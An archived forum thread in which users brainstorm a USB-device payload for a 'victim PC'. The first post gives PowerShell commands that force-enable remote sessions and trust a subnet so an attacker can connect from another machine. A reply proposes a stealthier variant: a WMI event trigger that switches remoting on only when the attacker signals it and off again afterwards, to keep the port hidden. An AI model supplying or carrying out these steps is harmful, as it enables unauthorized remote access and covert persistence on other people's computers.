Jump to content

Remote Exec via PS (Payload Idea)

Dave-ee Jones

Recommended Posts


So here's a quick payload idea..

Plug BB into victim PC and enable remote connection on PS:

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trusthosts "172.16.16.*"

Head to another PC and launch remote PS commands (your laptop on the same network, maybe?):

Enter-PSSession -ComputerName "George"

Might work on the payload tomorrow or something, get a quick version going. I just posted to see what others could come up with or just have a Devil's Advocate try and stump me (probably not hard in this case).

Link to comment
Share on other sites

Hmm, been awhile since I enable PSRemoting.  I do not recall but after enabling does the machine usually require a reboot?

If not, there is actually a even more hidden idea.  WMI trigger to enable psremoting and allow your IP when some external event that you can control happens on the network or with a service on the machine.


Use bunny to create trigger and now there is no psremote port open.  Trigger WMI event from another machine so psremoting is enabled and then connect.  When done you may can have an event to shut it back down too.  

Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...